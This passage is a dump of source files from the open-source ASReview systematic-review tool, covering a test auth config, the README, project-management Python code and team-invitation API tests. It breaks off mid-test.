20, "blob_id": "6274a427c4d1d4e1d046d4a9aa371cb729bc5800", "content_id": "a2b2be0ffadaf5f5cd760d0ebc62a2457ace8643", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 335, "license_type": "permissive", "max_line_length": 37, "num_lines": 16, "path": "/asreview/webapp/tests/config/auth_verified_config.toml", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "TESTING = true\nDEBUG = true\nSECRET_KEY = \"my_very_secret_key\"\nSECURITY_PASSWORD_SALT = \"my_salt\"\nAUTHENTICATION_ENABLED = true\nALLOW_ACCOUNT_CREATION = true\nEMAIL_VERIFICATION = true\n\n[EMAIL_CONFIG]\nSERVER = \"localhost\"\nPORT = 465\nUSERNAME = \"[email protected]\"\nPASSWORD = \"secret_password\"\nUSE_TLS = false\nUSE_SSL = true\nREPLY_ADDRESS = \"[email protected]\"" }, { "alpha_fraction": 0.7540106773376465, "alphanum_fraction": 0.7782531380653381, "avg_line_length": 49.08928680419922, "blob_id": "fd887fd628cb031b0a53d37b0819bb961011c533", "content_id": "7e4b86d8f9678105fa0caca28f077c6ae1aa416e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5612, "license_type": "permissive", "max_line_length": 554, "num_lines": 112, "path": "/README.md", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "<p align=\"center\">\n <a href=\"https://github.com/asreview/asreview\">\n <img width=\"60%\" height=\"60%\" src=\"https://raw.githubusercontent.com/asreview/asreview-artwork/master/LogoASReview/SVG/GitHub_Repo_Card_Transparent.svg\">\n </a>\n</p>\n\n## ASReview: Active learning for Systematic Reviews\n\n[![PyPI version](https://badge.fury.io/py/asreview.svg)](https://badge.fury.io/py/asreview) [![Build Status](https://img.shields.io/endpoint.svg?url=https%3A%2F%2Factions-badge.atrox.dev%2Fasreview%2Fasreview%2Fbadge%3Fref%3Dmaster&style=flat)](https://actions-badge.atrox.dev/asreview/asreview/goto?ref=master) [![Documentation Status](https://readthedocs.org/projects/asreview/badge/?version=latest)](https://asreview.readthedocs.io/en/latest/?badge=latest) [![DOI](https://zenodo.org/badge/164874894.svg)](https://zenodo.org/badge/latestdoi/164874894)\n [![Downloads](https://pepy.tech/badge/asreview)](https://github.com/asreview/asreview#installation) [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/4755/badge)](https://bestpractices.coreinfrastructure.org/projects/4755)\n\nSystematically screening large amounts of textual data is time-consuming and\noften tiresome. The rapidly evolving field of Artificial Intelligence (AI) has\nallowed the development of AI-aided pipelines that assist in finding relevant\ntexts for search tasks. A well-established approach to increasing efficiency\nis screening prioritization via [Active\nLearning](https://asreview.readthedocs.io/en/latest/guides/activelearning.html).\n\nThe Active learning for Systematic Reviews (ASReview) project, published in\n[*Nature Machine Intelligence*](https://doi.org/10.1038/s42256-020-00287-7)\nimplements different machine learning algorithms that interactively query the\nresearcher. ASReview LAB is designed to accelerate the step of screening\ntextual data with a minimum of records to be read by a human with no or very\nfew false negatives. ASReview LAB will save time, increase the quality of\noutput and strengthen the transparency of work when screening large amounts of\ntextual data to retrieve relevant information. Active Learning will support \ndecision-making in any discipline or industry.\n\nASReview software implements three different modes:\n\n- **Oracle** :crystal_ball: Screen textual data in\n interaction with the active learning model. The reviewer is the 'oracle',\n making the labeling decisions.\n- **Exploration** :triangular_ruler: Explore or\n demonstrate ASReview LAB with a completely labeled dataset. This mode is\n suitable for teaching purposes.\n- **Simulation** :chart_with_upwards_trend: Evaluate\n the performance of active learning models on fully labeled data. Simulations\n can be run in ASReview LAB or via the command line interface with more\n advanced options.\n\n\n## Installation\n\nThe ASReview software requires Python 3.8 or later. Detailed step-by-step\ninstructions to install Python and ASReview are available for\n[Windows](https://asreview.ai/installation-guide-windows/) and\n[macOS](https://asreview.ai/installation-guide-macos/) users.\n\n```bash\npip install asreview\n```\n\nUpgrade ASReview with the following command:\n\n```bash\npip install --upgrade asreview\n```\n\nTo install ASReview LAB with Docker, see [Install with Docker](https://asreview.readthedocs.io/en/latest/installation.html).\n\n## How it works\n\n[![ASReview LAB explained - animation](https://img.youtube.com/vi/k-a2SCq-LtA/0.jpg)](https://www.youtube.com/watch?v=k-a2SCq-LtA)\n\n\n## Getting started\n\n[Getting Started with ASReview\nLAB](https://asreview.readthedocs.io/en/latest/about.html).\n\n[![ASReview LAB](https://github.com/asreview/asreview/blob/master/images/ASReviewWebApp.png?raw=true)](https://asreview.readthedocs.io/en/latest/lab/overview_lab.html \"ASReview LAB\")\n\n## Citation\n\nThe following publication in [Nature Machine\nIntelligence](https://doi.org/10.1038/s42256-020-00287-7) can be used to cite\nthe project.\n\n> van de Schoot, R., de Bruin, J., Schram, R. et al. An open source machine\n learning framework for efficient and transparent systematic reviews.\n Nat Mach Intell 3, 125–133 (2021). https://doi.org/10.1038/s42256-020-00287-7\n\nFor citing the software, please refer to the specific release of\nthe ASReview software on Zenodo https://doi.org/10.5281/zenodo.3345592. The menu on the\nright can be used to find the citation format of prevalence.\n\nFor more scientific publications on the ASReview software, go to\n[asreview.ai/papers](https://asreview.ai/papers/).\n\n## Contact\n\nFor an overview of the team working on ASReview, see [ASReview Research Team](https://asreview.ai/about).\nASReview LAB is maintained by\n[Jonathan de Bruin](https://github.com/J535D165) and [Yongchao Terry Ma](https://github.com/terrymyc).\n\nThe best resources to find an answer to your question or ways to get in\ncontact with the team are:\n\n- Documentation - [asreview.readthedocs.io](https://asreview.readthedocs.io/)\n- Newsletter - [asreview.ai/newsletter/subscribe](https://asreview.ai/newsletter/subscribe)\n- Quick tour - [ASReview LAB quick tour](https://asreview.readthedocs.io/en/latest/lab/overview_lab.html)\n- Issues or feature requests - [ASReview issue tracker](https://github.com/asreview/asreview/issues)\n- FAQ - [ASReview Discussions](https://github.com/asreview/asreview/discussions?discussions_q=sort%3Atop)\n- Donation - [asreview.ai/donate](https://asreview.ai/donate)\n- Contact - [[email protected]](mailto:[email protected])\n\n## License\n\nThe ASReview software has an Apache 2.0 [LICENSE](LICENSE). The ASReview team\naccepts no responsibility or liability for the use of the ASReview tool or any\ndirect or indirect damages arising out of the application of the tool.\n" }, { "alpha_fraction": 0.6302521228790283, "alphanum_fraction": 0.6302521228790283, "avg_line_length": 25.44444465637207, "blob_id": "b1b1eeb41fd7cbef76e1afeeead3efb48278b8fe", "content_id": "42ab0a86b4304239a427c305e36638168dd83ca5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 238, "license_type": "permissive", "max_line_length": 64, "num_lines": 9, "path": "/asreview/webapp/src/StyledComponents/StyledMenuItem.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import { MenuItem } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nexport const StyledMenuItem = styled(MenuItem)(({ theme }) => ({\n cursor: \"default\",\n [`:hover`]: {\n backgroundColor: \"transparent\",\n },\n}));\n" }, { "alpha_fraction": 0.590429425239563, "alphanum_fraction": 0.5918527841567993, "avg_line_length": 31.238924026489258, "blob_id": "b04b14915d91acf5b2d35a65d119dc5bb964b843", "content_id": "b678033ef13ce4b44bff8a3477163ade8eae2cc7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20375, "license_type": "permissive", "max_line_length": 88, "num_lines": 632, "path": "/asreview/project.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport logging\nimport os\nimport shutil\nimport tempfile\nimport time\nimport zipfile\nfrom contextlib import contextmanager\nfrom datetime import datetime\nfrom functools import wraps\nfrom pathlib import Path\nfrom uuid import uuid4\n\nimport jsonschema\nimport numpy as np\nfrom filelock import FileLock\nfrom scipy.sparse import csr_matrix\nfrom scipy.sparse import load_npz\nfrom scipy.sparse import save_npz\n\nfrom asreview._version import get_versions\nfrom asreview.config import LABEL_NA\nfrom asreview.config import PROJECT_MODE_SIMULATE\nfrom asreview.config import PROJECT_MODES\nfrom asreview.config import SCHEMA\nfrom asreview.data import ASReviewData\nfrom asreview.state.errors import StateNotFoundError\nfrom asreview.state.sqlstate import SQLiteState\nfrom asreview.utils import asreview_path\n\nPATH_PROJECT_CONFIG = \"project.json\"\nPATH_PROJECT_CONFIG_LOCK = \"project.json.lock\"\nPATH_FEATURE_MATRICES = \"feature_matrices\"\n\n\nclass ProjectError(Exception):\n pass\n\n\nclass ProjectExistsError(Exception):\n pass\n\n\nclass ProjectNotFoundError(Exception):\n pass\n\n\ndef get_project_path(folder_id):\n \"\"\"Get the project directory.\n\n Arguments\n ---------\n folder_id: str\n The id of the folder containing a project. If there is no\n authentication, the folder_id is equal to the project_id. Otherwise,\n this is equal to {project_owner_id}_{project_id}.\n \"\"\"\n return Path(asreview_path(), folder_id)\n\n\ndef project_from_id(f):\n \"\"\"Decorator function that takes a user account as parameter,\n the user account is used to get the correct sub folder in which\n the projects is\n \"\"\"\n\n @wraps(f)\n def decorated_function(project_id, *args, **kwargs):\n project_path = get_project_path(project_id)\n if not is_project(project_path):\n raise ProjectNotFoundError(f\"Project '{project_id}' not found\")\n project = ASReviewProject(project_path, project_id=project_id)\n return f(project, *args, **kwargs)\n\n return decorated_function\n\n\ndef get_projects(project_paths=None):\n \"\"\"Get the ASReview projects at the given paths.\n\n Arguments\n ---------\n project_paths : list[Path], optional\n List of paths to projects. By default all the projects in the asreview\n folder are used, by default None\n\n Returns\n -------\n list[ASReviewProject]\n Projects at the given project paths.\n \"\"\"\n if project_paths is None:\n project_paths = [path for path in asreview_path().iterdir() if path.is_dir()]\n\n return [ASReviewProject(project_path) for project_path in project_paths]\n\n\ndef is_project(project_path):\n project_path = Path(project_path) / PATH_PROJECT_CONFIG\n\n return project_path.exists()\n\n\ndef is_v0_project(project_path):\n \"\"\"Check if a project file is of a ASReview version 0 project.\"\"\"\n\n return not Path(project_path, \"reviews\").exists()\n\n\n@contextmanager\ndef open_state(asreview_obj, review_id=None, read_only=True):\n \"\"\"Initialize a state class instance from a project folder.\n\n Arguments\n ---------\n asreview_obj: str/pathlike/ASReviewProject\n Filepath to the (unzipped) project folder or ASReviewProject object.\n review_id: str\n Identifier of the review from which the state will be instantiated.\n If none is given, the first review in the reviews folder will be taken.\n read_only: bool\n Whether to open in read_only mode.\n\n Returns\n -------\n SQLiteState\n \"\"\"\n\n # Unzip the ASReview data if needed.\n if isinstance(asreview_obj, ASReviewProject):\n project = asreview_obj\n elif zipfile.is_zipfile(asreview_obj) and Path(asreview_obj).suffix == \".asreview\":\n if not read_only:\n raise ValueError(\"ASReview files do not support not read only files.\")\n\n # work from a temp dir\n tmpdir = tempfile.TemporaryDirectory()\n project = ASReviewProject.load(asreview_obj, tmpdir.name)\n else:\n project = ASReviewProject(asreview_obj)\n\n # init state class\n state = SQLiteState(read_only=read_only)\n\n try:\n if len(project.reviews) > 0:\n if review_id is None:\n review_id = project.config[\"reviews\"][0][\"id\"]\n logging.debug(f\"Opening review {review_id}.\")\n state._restore(project.project_path, review_id)\n elif len(project.reviews) == 0 and not read_only:\n review_id = uuid4().hex\n logging.debug(f\"Create new review (state) with id {review_id}.\")\n state._create_new_state_file(project.project_path, review_id)\n project.add_review(review_id)\n else:\n raise StateNotFoundError(\n \"State file does not exist, and in \" \"read only mode.\"\n )\n yield state\n finally:\n try:\n state.close()\n except AttributeError:\n # file seems to be closed, do nothing\n pass\n\n\nclass ASReviewProject:\n \"\"\"Project class for ASReview project files.\"\"\"\n\n def __init__(self, project_path, project_id=None):\n self.project_path = Path(project_path)\n self.project_id = project_id\n\n @classmethod\n def create(\n cls,\n project_path,\n project_id=None,\n project_mode=\"oracle\",\n project_name=None,\n project_description=None,\n project_authors=None,\n ):\n \"\"\"Initialize the necessary files specific to the web app.\"\"\"\n\n project_path = Path(project_path)\n\n if is_project(project_path):\n raise ProjectExistsError(\"Project already exists.\")\n\n if project_mode not in PROJECT_MODES:\n raise ValueError(\n f\"Project mode '{project_mode}' is not in \" f\"{PROJECT_MODES}.\"\n )\n\n if project_id is None:\n project_id = project_path.stem\n\n if project_name is None:\n project_name = project_path.stem\n\n if project_path.is_dir():\n raise IsADirectoryError(f\"Project folder {project_path} already exists.\")\n\n try:\n project_path.mkdir(parents=True, exist_ok=True)\n Path(project_path, \"data\").mkdir(exist_ok=True)\n Path(project_path, PATH_FEATURE_MATRICES).mkdir(exist_ok=True)\n Path(project_path, \"reviews\").mkdir(exist_ok=True)\n\n config = {\n \"version\": get_versions()[\"version\"],\n \"id\": project_id,\n \"mode\": project_mode,\n \"name\": project_name,\n \"description\": project_description,\n \"authors\": project_authors,\n \"created_at_unix\": int(time.time()),\n \"datetimeCreated\": str(datetime.now()),\n \"reviews\": [],\n \"feature_matrices\": [],\n }\n\n # validate new config before storing\n jsonschema.validate(instance=config, schema=SCHEMA)\n\n project_fp = Path(project_path, PATH_PROJECT_CONFIG)\n project_fp_lock = Path(project_path, PATH_PROJECT_CONFIG_LOCK)\n lock = FileLock(project_fp_lock, timeout=3)\n\n # create a file with project info\n with lock:\n with open(project_fp, \"w\") as f:\n json.dump(config, f)\n\n except Exception as err:\n # remove all generated folders and raise error\n shutil.rmtree(project_path)\n raise err\n\n return cls(project_path, project_id=project_id)\n\n @property\n def config(self):\n try:\n return self._config\n except AttributeError:\n project_fp = Path(self.project_path, PATH_PROJECT_CONFIG)\n project_fp_lock = Path(self.project_path, PATH_PROJECT_CONFIG_LOCK)\n lock = FileLock(project_fp_lock, timeout=3)\n\n try:\n with lock:\n # read the file with project info\n with open(project_fp, \"r\") as fp:\n config = json.load(fp)\n self._config = config\n\n return config\n\n except FileNotFoundError:\n raise ProjectNotFoundError(f\"Project '{self.project_path}' not found\")\n\n @config.setter\n def config(self, config):\n project_fp = Path(self.project_path, PATH_PROJECT_CONFIG)\n project_fp_lock = Path(self.project_path, PATH_PROJECT_CONFIG_LOCK)\n lock = FileLock(project_fp_lock, timeout=3)\n\n with lock:\n with open(project_fp, \"w\") as f:\n json.dump(config, f)\n\n self._config = config\n\n def update_config(self, **kwargs):\n \"\"\"Update project info\"\"\"\n\n kwargs_copy = kwargs.copy()\n\n # validate schema\n if \"mode\" in kwargs_copy and kwargs_copy[\"mode\"] not in PROJECT_MODES:\n raise ValueError(\"Project mode '{}' not found.\".format(kwargs_copy[\"mode\"]))\n\n # update project file\n config = self.config\n config.update(kwargs_copy)\n\n # validate new config before storing\n jsonschema.validate(instance=config, schema=SCHEMA)\n\n self.config = config\n return config\n\n def add_dataset(self, file_name):\n \"\"\"Add file path to the project file.\n\n Add file to data subfolder and fill the pool of iteration 0.\n \"\"\"\n self.update_config(dataset_path=file_name)\n\n # fill the pool of the first iteration\n fp_data = Path(self.project_path, \"data\", self.config[\"dataset_path\"])\n as_data = ASReviewData.from_file(fp_data)\n\n with open_state(self.project_path, read_only=False) as state:\n # save the record ids in the state file\n state.add_record_table(as_data.record_ids)\n\n # if the data contains labels, add them to the state file\n if (\n self.config[\"mode\"] != PROJECT_MODE_SIMULATE\n and as_data.labels is not None\n ):\n labeled_indices = np.where(as_data.labels != LABEL_NA)[0]\n labels = as_data.labels[labeled_indices].tolist()\n labeled_record_ids = as_data.record_ids[labeled_indices].tolist()\n\n # add the labels as prior data\n state.add_labeling_data(\n record_ids=labeled_record_ids,\n labels=labels,\n notes=[None for _ in labeled_record_ids],\n prior=True,\n )\n\n def remove_dataset(self):\n \"\"\"Remove dataset from project.\"\"\"\n # reset dataset_path\n self.update_config(dataset_path=None)\n\n # remove datasets from project\n shutil.rmtree(Path(self.project_path, \"data\"))\n\n # remove state file if present\n if Path(self.project_path, \"reviews\").is_dir() and any(\n Path(self.project_path, \"reviews\").iterdir()\n ):\n self.delete_review()\n\n def clean_tmp_files(self):\n \"\"\"Clean temporary files in a project.\n\n Arguments\n ---------\n project_id: str\n The id of the current project.\n \"\"\"\n\n # clean pickle files\n for f_pickle in self.project_path.rglob(\"*.pickle\"):\n try:\n os.remove(f_pickle)\n except OSError as e:\n print(f\"Error: {f_pickle} : {e.strerror}\")\n\n @property\n def feature_matrices(self):\n try:\n return self.config[\"feature_matrices\"]\n except Exception:\n return []\n\n def add_feature_matrix(self, feature_matrix, feature_extraction_method):\n \"\"\"Add feature matrix to project file.\n\n Arguments\n ---------\n feature_matrix: numpy.ndarray, scipy.sparse.csr.csr_matrix\n The feature matrix to add to the project file.\n feature_extraction_method: str\n Name of the feature extraction method.\n \"\"\"\n # Make sure the feature matrix is in csr format.\n if isinstance(feature_matrix, np.ndarray):\n feature_matrix = csr_matrix(feature_matrix)\n if not isinstance(feature_matrix, csr_matrix):\n raise ValueError(\n \"The feature matrix should be convertible to type \"\n \"scipy.sparse.csr.csr_matrix.\"\n )\n\n matrix_filename = f\"{feature_extraction_method}_feature_matrix.npz\"\n save_npz(\n Path(self.project_path, PATH_FEATURE_MATRICES, matrix_filename),\n feature_matrix,\n )\n\n # Add the feature matrix to the project config.\n config = self.config\n\n feature_matrix_config = {\n \"id\": feature_extraction_method,\n \"filename\": matrix_filename,\n }\n\n # Add container for feature matrices.\n if \"feature_matrices\" not in config:\n config[\"feature_matrices\"] = []\n\n config[\"feature_matrices\"].append(feature_matrix_config)\n\n self.config = config\n\n def get_feature_matrix(self, feature_extraction_method):\n \"\"\"Get the feature matrix from the project file.\n\n Arguments\n ---------\n feature_extraction_method: str\n Name of the feature extraction method for which to get the matrix.\n\n Returns\n -------\n scipy.sparse.csr_matrix:\n Feature matrix in sparse format.\n \"\"\"\n matrix_filename = f\"{feature_extraction_method}_feature_matrix.npz\"\n return load_npz(Path(self.project_path, PATH_FEATURE_MATRICES, matrix_filename))\n\n @property\n def reviews(self):\n try:\n return self.config[\"reviews\"]\n except Exception:\n return []\n\n def add_review(self, review_id, start_time=None, status=\"setup\"):\n \"\"\"Add new review metadata.\n\n Arguments\n ---------\n review_id: str\n The review_id uuid4.\n status: str\n The status of the review. One of 'setup', 'running',\n 'finished'.\n start_time:\n Start of the review.\n\n \"\"\"\n if start_time is None:\n start_time = datetime.now()\n\n # Add the review to the project.\n config = self.config\n\n review_config = {\n \"id\": review_id,\n \"start_time\": str(start_time),\n \"status\": status\n # \"end_time\": datetime.now()\n }\n\n # add container for reviews\n if \"reviews\" not in config:\n config[\"reviews\"] = []\n\n config[\"reviews\"].append(review_config)\n\n self.config = config\n\n def update_review(self, review_id=None, **kwargs):\n \"\"\"Update review metadata.\n\n Arguments\n ---------\n review_id: str\n The review_id uuid4. Default None, which is the\n first added review.\n status: str\n The status of the review. One of 'setup', 'running',\n 'finished'.\n start_time:\n Start of the review.\n end_time: End time of the review.\n \"\"\"\n\n # read the file with project info\n config = self.config\n\n if review_id is None:\n review_index = 0\n else:\n review_index = [x[\"id\"] for x in self.config[\"reviews\"]].index(review_id)\n\n review_config = config[\"reviews\"][review_index]\n review_config.update(kwargs)\n\n config[\"reviews\"][review_index] = review_config\n\n # update the file with project info\n self.config = config\n\n def delete_review(self, remove_folders=False):\n try:\n # remove the folder tree\n shutil.rmtree(Path(self.project_path, PATH_FEATURE_MATRICES))\n\n # recreate folder structure if True\n if not remove_folders:\n Path(self.project_path, PATH_FEATURE_MATRICES).mkdir(exist_ok=True)\n except Exception:\n print(\"Failed to remove feature matrices.\")\n\n try:\n path_review = Path(self.project_path, \"reviews\")\n shutil.rmtree(path_review)\n if not remove_folders:\n Path(self.project_path, \"reviews\").mkdir(exist_ok=True)\n except Exception:\n print(\"Failed to remove sql database.\")\n\n # update the config\n self.update_config(**{\"reviews\": [], \"feature_matrices\": []})\n\n def mark_review_finished(self, review_id=None):\n \"\"\"Mark a review in the project as finished.\n\n If no review_id is given, mark the first review as finished.\n\n Arguments\n ---------\n review_id: str\n Identifier of the review to mark as finished.\n \"\"\"\n\n self.update_review(\n review_id=review_id, status=\"finished\", end_time=str(datetime.now())\n )\n\n def export(self, export_fp):\n if Path(export_fp).suffix != \".asreview\":\n raise ValueError(\"Export file should have .asreview extension.\")\n\n if Path(export_fp) == Path(self.project_path):\n raise ValueError(\"export_fp should not be identical to project path.\")\n\n export_fp_tmp = Path(export_fp).with_suffix(\".asreview.zip\")\n\n # copy the source tree, but ignore pickle files\n shutil.copytree(\n self.project_path,\n export_fp_tmp,\n ignore=shutil.ignore_patterns(\"*.pickle\", \"*.lock\"),\n )\n\n # create the archive\n shutil.make_archive(export_fp_tmp, \"zip\", root_dir=export_fp_tmp)\n\n # remove the unzipped folder and move zip\n shutil.rmtree(export_fp_tmp)\n shutil.move(f\"{export_fp_tmp}.zip\", export_fp)\n\n @classmethod\n def load(cls, asreview_file, project_path, safe_import=False):\n tmpdir = tempfile.TemporaryDirectory().name\n\n try:\n # Unzip the project file\n with zipfile.ZipFile(asreview_file, \"r\") as zip_obj:\n zip_filenames = zip_obj.namelist()\n\n # raise error if no ASReview project file\n if PATH_PROJECT_CONFIG not in zip_filenames:\n raise ValueError(\"Project file is not valid project.\")\n\n # extract all files to folder\n for f in zip_filenames:\n if not f.endswith(\".pickle\"):\n zip_obj.extract(f, path=tmpdir)\n\n except zipfile.BadZipFile:\n raise ValueError(\"File is not an ASReview file.\")\n\n with open(Path(tmpdir, PATH_PROJECT_CONFIG), \"r\") as f:\n project_config = json.load(f)\n\n if safe_import:\n # assign a new id to the project.\n project_config[\"id\"] = uuid4().hex\n with open(Path(tmpdir, PATH_PROJECT_CONFIG), \"r+\") as f:\n # write to file\n f.seek(0)\n json.dump(project_config, f)\n f.truncate()\n\n # location to copy file to\n # Move the project from the temp folder to the projects folder.\n os.replace(tmpdir, Path(project_path, project_config[\"id\"]))\n\n return cls(Path(project_path, project_config[\"id\"]))\n\n def set_error(self, err, save_error_message=True):\n err_type = type(err).__name__\n self.update_review(status=\"error\")\n\n # write error to file if label method is prior (first iteration)\n if save_error_message:\n message = {\n \"message\": f\"{err_type}: {err}\",\n \"type\": f\"{err_type}\",\n \"datetime\": str(datetime.now()),\n }\n\n with open(Path(self.project_path, \"error.json\"), \"w\") as f:\n json.dump(message, f)\n\n def remove_error(self, status):\n error_path = self.project_path / \"error.json\"\n if error_path.exists():\n try:\n os.remove(error_path)\n except Exception as err:\n raise ValueError(f\"Failed to clear the error. {err}\")\n self.update_review(status=status)\n" }, { "alpha_fraction": 0.6550622582435608, "alphanum_fraction": 0.6743417382240295, "avg_line_length": 31.768953323364258, "blob_id": "df45ca3dd5ca5f87d935b6b7671cc5563043a249", "content_id": "ed99aaababbb38fd7be81f4ce1b9d9f199f11d56", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9077, "license_type": "permissive", "max_line_length": 76, "num_lines": 277, "path": "/asreview/webapp/tests/test_api/test_teams.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from inspect import getfullargspec\n\nimport pytest\n\nimport asreview.webapp.tests.utils.api_utils as au\n\n# NOTE: user 1 is signed in and has a single project, invites\n# other users who accept and reject\n\n\n# Test sending an invitation\ndef test_user1_sends_invitation(setup_auth):\n client, _, user2, _, project = setup_auth\n # invite\n status_code, resp_data = au.invite(client, project, user2)\n assert status_code == 200\n assert resp_data[\"message\"] == 'User \"[email protected]\" invited.'\n\n\n# Testing listing invitations\ndef test_user2_list_invitations(setup_auth):\n client, user1, user2, _, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 2\n au.signin_user(client, user2)\n # get all invitations\n status_code, resp_data = au.list_invitations(client)\n invitations = resp_data[\"invited_for_projects\"]\n assert status_code == 200\n assert len(invitations) == 1\n assert invitations[0][\"project_id\"] == project.project_id\n assert invitations[0][\"owner_id\"] == user1.id\n\n\n# Testing accepting an invitation\ndef test_user2_accept_invitation(setup_auth):\n client, _, user2, _, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 2\n au.signin_user(client, user2)\n # accept invitation\n status_code, resp_data = au.accept_invitation(client, project)\n assert status_code == 200\n assert resp_data[\"message\"] == \"User accepted invitation for project.\"\n\n\n# Test rejecting invitation\ndef test_user2_rejects_invitation(setup_auth):\n client, _, user2, _, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 2\n au.signin_user(client, user2)\n # reject invitation\n status_code, resp_data = au.reject_invitation(client, project)\n assert status_code == 200\n assert resp_data[\"message\"] == \"User rejected invitation for project.\"\n\n\n# Test owner removes invitation\ndef test_owner_deletes_invitation(setup_auth):\n client, _, user2, _, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # remove invitation\n status_code, resp_data = au.delete_invitation(client, project, user2)\n assert status_code == 200\n assert resp_data[\"message\"] == \"Owner deleted invitation.\"\n\n\n# Test owner views collaboration team\ndef test_view_collaboration_team_with_pending_invitation(setup_auth):\n client, _, user2, _, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # checks team\n status_code, resp_data = au.list_collaborators(client, project)\n assert status_code == 200\n assert resp_data[\"collaborators\"] == []\n assert resp_data[\"invitations\"] == [user2.id]\n\n\n# Test owner views collaboration team\ndef test_view_collaboration_team_with_accepted_invitation(setup_auth):\n client, user1, user2, _, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 2\n au.signin_user(client, user2)\n # accept invitation and signs out\n au.accept_invitation(client, project)\n au.signout_user(client)\n # user 1 signs up\n au.signin_user(client, user1)\n # checks team\n status_code, resp_data = au.list_collaborators(client, project)\n assert status_code == 200\n assert resp_data[\"collaborators\"] == [user2.id]\n assert resp_data[\"invitations\"] == []\n\n\n# Test owner removes collaboration\ndef test_owner_deletes_collaboration(setup_auth):\n client, user1, user2, _, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 2\n au.signin_user(client, user2)\n # accept invitation and signs out\n au.accept_invitation(client, project)\n au.signout_user(client)\n # user 1 signs up\n au.signin_user(client, user1)\n # remove from team\n status_code, resp_data = au.delete_collaboration(client, project, user2)\n assert status_code == 200\n assert resp_data[\"message\"] == \"Collaborator removed from project.\"\n\n\n# Test collaborator withdraws from collaboration\ndef test_collaborator_withdrawal(setup_auth):\n client, _, user2, _, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 2\n au.signin_user(client, user2)\n # accept invitation and signs out\n au.accept_invitation(client, project)\n # withdrawal\n status_code, resp_data = au.delete_collaboration(client, project, user2)\n assert status_code == 200\n assert resp_data[\"message\"] == \"Collaborator removed from project.\"\n\n\n# ###################\n# TEST LOGIN REQUIRED\n# ###################\n\n\[email protected](\n \"api_call\",\n [\n au.invite,\n au.list_invitations,\n au.list_collaborators,\n au.accept_invitation,\n au.reject_invitation,\n au.delete_invitation,\n au.delete_collaboration,\n ],\n)\n# Test login required for all api routes\ndef test_login_required(setup_auth, api_call):\n client, _, user2, _, project = setup_auth\n au.signout_user(client)\n number_of_params = len(getfullargspec(api_call).args)\n if number_of_params == 1:\n status_code, resp_data = api_call(client)\n elif number_of_params == 2:\n status_code, resp_data = api_call(client, project)\n elif number_of_params == 3:\n status_code, resp_data = api_call(client, project, user2)\n # all calls must return a 401:\n assert status_code == 401\n assert resp_data[\"message\"] == \"Login required.\"\n\n\n# ###################\n# TEST NO PERMISSION\n# ###################\n\n\n# Test user3 can't see invite from user 1 to user 2\ndef test_user3_cant_see_other_invites(setup_auth):\n client, _, user2, user3, project = setup_auth\n # invite to make sure we have an invitation (user1 is signed in)\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 3 (not invited)\n au.signin_user(client, user3)\n # get all invitations\n status_code, resp_data = au.list_invitations(client)\n assert status_code == 200\n assert resp_data[\"invited_for_projects\"] == []\n\n\n# Test user3 can't accept invite to user 2\ndef test_user3_cant_reject_invite_of_user_2(setup_auth):\n client, _, user2, user3, project = setup_auth\n # invite to make sure we have an invitation (user1 is signed in)\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 3 (not invited)\n au.signin_user(client, user3)\n status_code, resp_data = au.accept_invitation(client, project)\n assert status_code == 404\n assert resp_data[\"message\"] == \"Request can not made by current user.\"\n\n\n# Test user3 can't reject invite to user 2\ndef test_user3_cant_accept_invite_of_user_2(setup_auth):\n client, _, user2, user3, project = setup_auth\n # invite to make sure we have an invitation (user1 is signed in)\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 3 (not invited)\n au.signin_user(client, user3)\n status_code, resp_data = au.reject_invitation(client, project)\n assert status_code == 404\n assert resp_data[\"message\"] == \"Request can not made by current user.\"\n\n\n# Test user3 can't delete invitation\ndef test_user3_cant_delete_invitation(setup_auth):\n client, _, user2, user3, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 3 (not invited)\n au.signin_user(client, user3)\n # remove invitation\n status_code, resp_data = au.delete_invitation(client, project, user2)\n assert status_code == 404\n assert resp_data[\"message\"] == \"Request can not made by current user.\"\n\n\n# Test user3 can't see collaboration team of user 1\ndef test_user3_cant_see_collaboration_team(setup_auth):\n client, _, user2, user3, project = setup_auth\n # invite\n au.invite(client, 